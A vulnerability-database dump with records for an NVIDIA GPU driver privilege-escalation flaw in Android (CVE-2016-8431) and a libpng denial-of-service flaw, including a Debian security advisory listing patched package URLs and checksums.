            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-8431",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-00176",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201701-051",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-8431",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00176"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8431"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006803"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8431"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-051"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the NVIDIA GPU driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.18. Android ID: A-32402179. References: N-CVE-2016-8431. GooglePixelC is a tablet from Google Inc. in the United States. Google Nexus is prone to multiple privilege-escalation vulnerabilities. \nThese issues are being tracked by Android Bug IDs A-32402179  and A-32447738",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8431"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006803"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00176"
      },
      {
        "db": "BID",
        "id": "95236"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8431"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-8431",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "95236",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006803",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00176",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-051",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8431",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00176"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8431"
      },
      {
        "db": "BID",
        "id": "95236"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006803"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8431"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-051"
      }
    ]
  },
  "id": "VAR-201701-0102",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00176"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00176"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:05:08.636000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin - January 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GooglePixel NVIDIA GPUDriver Privilege Escalation Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/87670"
      },
      {
        "title": "Google Pixel C Android NVIDIA GPU Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=66795"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014January 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=e8654f311f23268a7da69416ca7535a2"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00176"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8431"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006803"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-051"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006803"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8431"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/95236"
      },
      {
        "trust": 1.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8431"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-8431"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.3,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html "
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/264.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00176"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8431"
      },
      {
        "db": "BID",
        "id": "95236"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006803"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8431"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-051"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00176"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8431"
      },
      {
        "db": "BID",
        "id": "95236"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006803"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8431"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-051"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00176"
      },
      {
        "date": "2017-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8431"
      },
      {
        "date": "2017-01-03T00:00:00",
        "db": "BID",
        "id": "95236"
      },
      {
        "date": "2017-01-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006803"
      },
      {
        "date": "2017-01-12T20:59:00.577000",
        "db": "NVD",
        "id": "CVE-2016-8431"
      },
      {
        "date": "2017-01-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-051"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00176"
      },
      {
        "date": "2017-01-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8431"
      },
      {
        "date": "2017-01-12T01:09:00",
        "db": "BID",
        "id": "95236"
      },
      {
        "date": "2017-01-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006803"
      },
      {
        "date": "2017-01-18T02:59:14.297000",
        "db": "NVD",
        "id": "CVE-2016-8431"
      },
      {
        "date": "2017-01-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-051"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-051"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NVIDIA GPU Vulnerability that could elevate privileges in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006803"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-051"
      }
    ],
    "trust": 0.6
  }
}

var-200705-0670
Vulnerability from variot

The png_handle_tRNS function in pngrutil.c in libpng before 1.0.25 and 1.2.x before 1.2.17 allows remote attackers to cause a denial of service (application crash) via a grayscale PNG image with a bad tRNS chunk CRC value. The libpng library contains a denial-of-service vulnerability. libpng There is a service disruption (DoS) Vulnerabilities exist PNG (Portable Network Graphics) Format image processing library libpng of png_handle_tRNS() Functions include CRC Incorrect processing after check PNG Denial of service when processing files (DoS) There is a vulnerability that becomes a condition.Web Pre-crafted, installed on site or attached to email png By browsing the file, service operation interruption (DoS) It may be in a state. Successful exploits may allow remote attackers to cause denial-of-service conditions on computers running the affected library. This issue affects 'libpng' 1.2.16 and prior versions.

CVE-2007-3476

An array indexing error in libgd's GIF handling could induce a
denial of service (crash with heap corruption) if exceptionally
large color index values are supplied in a maliciously crafted
GIF image file.

CVE-2007-3477

The imagearc() and imagefilledarc() routines in libgd allow
an attacker in control of the parameters used to specify
the degrees of arc for those drawing functions to perform
a denial of service attack (excessive CPU consumption).

CVE-2007-3996

Multiple integer overflows exist in libgd's image resizing and
creation routines; these weaknesses allow an attacker in control
of the parameters passed to those routines to induce a crash or
execute arbitrary code with the privileges of the user running
an application or interpreter linked against libgd2.

Debian GNU/Linux 4.0 alias etch


Debian (stable)


Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA-1750-1 security@debian.org http://www.debian.org/security/ Florian Weimer March 22, 2009 http://www.debian.org/security/faq


Package : libpng Vulnerability : several Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2007-2445 CVE-2007-5269 CVE-2008-1382 CVE-2008-5907 CVE-2008-6218 CVE-2009-0040 Debian Bug : 446308 476669 516256 512665

Several vulnerabilities have been discovered in libpng, a library for reading and writing PNG files. (CVE-2008-1382)

The png_check_keyword might allow context-dependent attackers to set the value of an arbitrary memory location to zero via vectors involving creation of crafted PNG files with keywords. (CVE-2009-0040)

For the old stable distribution (etch), these problems have been fixed in version1.2.15~beta5-1+etch2.

For the stable distribution (lenny), these problems have been fixed in version 1.2.27-2+lenny2. (Only CVE-2008-5907, CVE-2008-5907 and CVE-2009-0040 affect the stable distribution.)

For the unstable distribution (sid), these problems have been fixed in version 1.2.35-1.

We recommend that you upgrade your libpng packages.

Upgrade instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get upgrade will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch


Source archives:

http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz Size/MD5 checksum: 829038 77ca14fcee1f1f4daaaa28123bd0b22d http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.diff.gz Size/MD5 checksum: 18622 e1e1b7d74b9af5861bdcfc50154d2b4c http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.dsc Size/MD5 checksum: 1033 a0668aeec893b093e1f8f68316a04041

Architecture independent packages:

http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.15~beta5-1+etch2_all.deb Size/MD5 checksum: 882 eb0e501247bd91837c090cf3353e07c6

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_alpha.deb Size/MD5 checksum: 214038 1dd9a6d646d8ae533fbabbb32e03149a http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_alpha.deb Size/MD5 checksum: 204478 d04c5a2151ca4aa8b1fa6f1b3078e418 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_alpha.udeb Size/MD5 checksum: 85270 1fcfca5bfd47a2f6611074832273ac0b

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_amd64.deb Size/MD5 checksum: 188124 703758e444f77281b9104e20c358b521 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_amd64.deb Size/MD5 checksum: 179186 d2596f942999be2acb79e77d12d99c2e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_amd64.udeb Size/MD5 checksum: 69056 4bd8858ff3ef96c108d2f357e67c7b73

arm architecture (ARM)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_arm.udeb Size/MD5 checksum: 63714 14bd7b3fa29b01ebc18b6611eea486d1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_arm.deb Size/MD5 checksum: 168764 54a349016bbdd6624fe8552bd951fee0 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_arm.deb Size/MD5 checksum: 182720 79e501f9c79d31b0f9c8b5a4f16f6a2e

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_hppa.udeb Size/MD5 checksum: 74440 e240adb3f2b0f8ed35a3c2fe2dd35da1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_hppa.deb Size/MD5 checksum: 187052 e5f7162d516fc3d8e953726d7fb5b6ae http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_hppa.deb Size/MD5 checksum: 194360 83928ed4057deade50551874a6a85d27

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_i386.udeb Size/MD5 checksum: 67656 66d9d533e26e4f74fbdd01bf55fa40b1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_i386.deb Size/MD5 checksum: 187710 20da5a533679aee19edf5cd0c339f2c9 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_i386.deb Size/MD5 checksum: 170784 b19d4f0f8be4d65dbb847079ce2effa8

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_ia64.deb Size/MD5 checksum: 227792 eb01ade8e4b4dba3215832b8c632548a http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_ia64.udeb Size/MD5 checksum: 108076 cb3ae7c7c66dcafce969608a437fdade http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_ia64.deb Size/MD5 checksum: 227388 83fa9e2ba1a370fe1b973688ab6096dd

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mips.deb Size/MD5 checksum: 187814 daa3c7c3aeae294c661324528e0f6c3e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mips.deb Size/MD5 checksum: 187016 e556557c1c570c66656232422af38c8e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mips.udeb Size/MD5 checksum: 67730 ae7ea1cd95eacae754ba35e9fae19818

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mipsel.udeb Size/MD5 checksum: 67996 4be0aa40152ac55a7355aea2204d7888 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mipsel.deb Size/MD5 checksum: 187852 19a6eddae81d4f9d768f8c0ef442b0ed http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mipsel.deb Size/MD5 checksum: 187282 119ae6083edd419fed3fe970cc507919

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_powerpc.deb Size/MD5 checksum: 178452 e48dc544abc3df3ec474930639e29469 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_powerpc.deb Size/MD5 checksum: 186636 b8319bb815dec618288cdd35cd37c191 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_powerpc.udeb Size/MD5 checksum: 67430 a3717e7c30011e60be99ce04983f2984

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_s390.deb Size/MD5 checksum: 178548 790f01dc85511343a4ef9b4832f3b1fa http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_s390.deb Size/MD5 checksum: 190648 a79ea20f0b8af58765d2b14ec276aa5a http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_s390.udeb Size/MD5 checksum: 71438 aa83c3a2ab4da51670da3eafcedddac9

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_sparc.udeb Size/MD5 checksum: 64914 13bcdda845e00493e1b25413452302d0 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_sparc.deb Size/MD5 checksum: 184734 0f0e7865607948f07a604c86fd4f94bb http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_sparc.deb Size/MD5 checksum: 172558 2853d84c9f9823d0bfe77b1fca00348d

Debian GNU/Linux 5.0 alias lenny


Source archives:

http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.diff.gz Size/MD5 checksum: 16783 64d84ee2a3098905d361711dc96698c9 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz Size/MD5 checksum: 783204 13a0de401db1972a8e68f47d5bdadd13 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.dsc Size/MD5 checksum: 1492 8c82810267b23916b6207fa40f0b6bce

Architecture independent packages:

http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny2_all.deb Size/MD5 checksum: 878 8d46f725bd49014cdb4e15508baea203

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_alpha.deb Size/MD5 checksum: 287802 470918bf3d543a1128df53d4bed78b3f http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_alpha.deb Size/MD5 checksum: 182372 df321c1623004da3cf1daacae952e8b6 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_alpha.udeb Size/MD5 checksum: 86746 975dccb76f777be09e8e5353704bf6bf

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_amd64.udeb Size/MD5 checksum: 71944 3f3bdfdee4699b4b3e5c793686330036 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_amd64.deb Size/MD5 checksum: 254598 122c139abf34eb461eca9847ec9dffe7 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_amd64.deb Size/MD5 checksum: 167190 1c17a5378b2e6b8fa8760847510f208b

arm architecture (ARM)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_arm.deb Size/MD5 checksum: 245788 9d3fe182d56caad3f9d8a436ca109b57 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_arm.udeb Size/MD5 checksum: 64754 81ee041de30e2e5343d38965ab0645c1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_arm.deb Size/MD5 checksum: 160222 5741adc357ec8f3f09c4c8e72f02ec88

armel architecture (ARM EABI)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_armel.udeb Size/MD5 checksum: 67178 71747c7d6f7bffde46bb38055948b781 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_armel.deb Size/MD5 checksum: 246680 bb9df968f72c62d5adceab0079c86e02 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_armel.deb Size/MD5 checksum: 163028 60bf255a23031c9c105d3582ed2c21bd

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_hppa.deb Size/MD5 checksum: 261298 a0bac6595474dc5778c764fab4acd9be http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_hppa.deb Size/MD5 checksum: 170170 de217ce54775d5f648ad369f4ce7cb72 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_hppa.udeb Size/MD5 checksum: 74124 affd4f1155bd1d571615b6c767886974

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_i386.udeb Size/MD5 checksum: 70314 865ea6726b205467e770d56d1530fdd2 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_i386.deb Size/MD5 checksum: 165892 cfcd37b7eee72625d13f09328bc24e23 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_i386.deb Size/MD5 checksum: 247056 bc860a52608d966576f581c27e89a86c

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_ia64.deb Size/MD5 checksum: 305532 d6f329a47a523353fcd527c48abb078c http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_ia64.deb Size/MD5 checksum: 207604 78b003ade0b48d1510f436f2e5008588 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_ia64.udeb Size/MD5 checksum: 112070 a0f1e5e8a85bcc1995faa1e031f5e16e

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mips.udeb Size/MD5 checksum: 68198 a68e0ba1f7a39bd9984414f4160de5bc http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mips.deb Size/MD5 checksum: 262138 f3580912592abe14609134cab2242728 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mips.deb Size/MD5 checksum: 163666 0c9f75230c396553e6062eb397d6b95c

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mipsel.deb Size/MD5 checksum: 163956 dfda7e322af96e8ae5104cfd9f955e92 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mipsel.udeb Size/MD5 checksum: 68468 9c357d2d831dca03ed0887c58a18c523 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mipsel.deb Size/MD5 checksum: 262162 a1d0ba1b7adb92a95180e6d65b398b5b

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_powerpc.udeb Size/MD5 checksum: 70814 3053467f8b8864802cc7261742abfa00 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_powerpc.deb Size/MD5 checksum: 166240 13acfd773d2a31bd555ac1936411fe95 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_powerpc.deb Size/MD5 checksum: 253322 d4a722d84e5c2f263d72a59dea00ce17

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_s390.deb Size/MD5 checksum: 253696 bc748b49195dcd01b5288349e3e85510 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_s390.udeb Size/MD5 checksum: 73624 f35735be37fc376c56941795a185c742 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_s390.deb Size/MD5 checksum: 169052 4cf962619d634ea59a39d14c32134594

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_sparc.udeb Size/MD5 checksum: 66216 07bcad5c11908d2fe6d358dfc94d9051 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_sparc.deb Size/MD5 checksum: 247212 f388365559e6b9313aa6048c6fa341f9 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_sparc.deb Size/MD5 checksum: 162316 16f01a96b1fec79e9614df831dba6a05

These files will probably be moved into the stable distribution on its next update.


For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJxnKQAAoJEL97/wQC1SS+7ecIAK6BKrPXLVq6hmj7dJLZWixA 4HMxumeGDUKuJBAxgQzB1jj1y4M3lnNVcVvOSfelxSO8lQLbFH1A3NGOthP1552h sjkFurJBpDDoAQWnfG8pHvUuou7/BWis/E0Av3JCLVV9CBfPHX2QVHHK4MvU/btY fHqm8ye00ae+CIzkpWpPpBJjsGIWOrLGVhrUGVxN/1nwu4cvBRj1Np/sCUo+3A0o OFwc/5RGwh4HMV7E3LyarlDQTkAQ0prMepxDe1mFalz2UA0zgqIZclUvq8JX2Y1S s0WWPLVFu+1uEBkAe4MvhoM7FH3K0NbKsfl214DVasUKFIMTR1kywh44Dho2j7g= =mMEO -----END PGP SIGNATURE----- .

The updated packages have been patched to correct this issue.


References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445 http://www.cert.org/advisories/684664


Updated Packages:

Mandriva Linux 2007.0: 4483193885966f919f283594719a0a90 2007.0/i586/libpng3-1.2.12-2.3mdv2007.0.i586.rpm d13427f7a6494c82a8becec26aaa158f 2007.0/i586/libpng3-devel-1.2.12-2.3mdv2007.0.i586.rpm 86e2b902df20f46bbab8c198be7bb623 2007.0/i586/libpng3-static-devel-1.2.12-2.3mdv2007.0.i586.rpm 2351bce470227141eecf5a3adb303ce7 2007.0/SRPMS/libpng-1.2.12-2.3mdv2007.0.src.rpm

